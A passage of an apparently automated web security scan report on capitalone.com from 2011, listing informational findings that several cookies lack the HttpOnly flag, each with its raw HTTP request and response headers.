Content-Length: 30558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Auto Loans - Ca
...[SNIP]...

11.420. http://www.capitalone.com/autoloans/lp/auto-loans-pict.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /autoloans/lp/auto-loans-pict.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /autoloans/lp/auto-loans-pict.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:23 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:22 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 12533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Save time and m
...[SNIP]...

11.421. http://www.capitalone.com/autoloans/refinance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /autoloans/refinance/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /autoloans/refinance/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:27 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D8%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:27 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesb=c_m%3D3; expires=Thu, 02-Feb-2012 22:12:27 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:27 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:26 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 24471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Auto Refinance
...[SNIP]...

11.422. http://www.capitalone.com/bank/commercial/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /bank/commercial/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bank/commercial/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:20 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D3; expires=Thu, 02-Feb-2012 22:12:20 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 41880

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Comme
...[SNIP]...

11.423. http://www.capitalone.com/bank/homeloansandmortgages/home-loan-assistance/legacy-ccb/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /bank/homeloansandmortgages/home-loan-assistance/legacy-ccb/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bank/homeloansandmortgages/home-loan-assistance/legacy-ccb/index.php?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C8_01_T_HLMAINFOCCB HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:22 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D1; expires=Thu, 02-Feb-2012 22:12:22 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 17136

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Home
...[SNIP]...

11.424. http://www.capitalone.com/banking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /banking/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /banking/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:12:01 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Location: http://www.capitalone.com/banking/personal/?
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/


11.425. http://www.capitalone.com/capitaloneplace/disclosures.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /capitaloneplace/disclosures.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /capitaloneplace/disclosures.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:43 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:43 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 22852


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Im
...[SNIP]...

11.426. http://www.capitalone.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /careers/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /careers/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_GBLFO_F1_03_T_C1 HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:40 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:40 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 35950

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>The l
...[SNIP]...

11.427. http://www.capitalone.com/checking-accounts/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /checking-accounts/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /checking-accounts/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:02 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:01 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 23738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

11.428. http://www.capitalone.com/contactus/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /contactus/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactus/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:28 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:27 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 28007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Capital O
...[SNIP]...

11.429. http://www.capitalone.com/contactus/faq.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /contactus/faq.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactus/faq.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:32 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:32 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 21007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Capital One Frequ
...[SNIP]...

11.430. http://www.capitalone.com/contactus/olbsupport.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /contactus/olbsupport.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactus/olbsupport.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:34 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:34 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 25849

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Onlin
...[SNIP]...

11.431. http://www.capitalone.com/creditcards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /creditcards/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /creditcards/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:51 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com
Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 31333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

11.432. http://www.capitalone.com/creditcards/balance_transfer_hp.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /creditcards/balance_transfer_hp.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /creditcards/balance_transfer_hp.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:11:53 GMT
Server: Apache
Location: http://www.capitalone.com/balance-transfer/
Cache-Control: max-age=0
Expires: Wed, 02 Feb 2011 22:11:53 GMT
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.capitalone.c
...[SNIP]...

11.433. http://www.capitalone.com/creditcards/products/browse-all/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /creditcards/products/browse-all/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /creditcards/products/browse-all/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:52 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D7%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com
Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 66271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

11.434. http://www.capitalone.com/creditcards/products/browse-all/popular/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /creditcards/products/browse-all/popular/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /creditcards/products/browse-all/popular/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
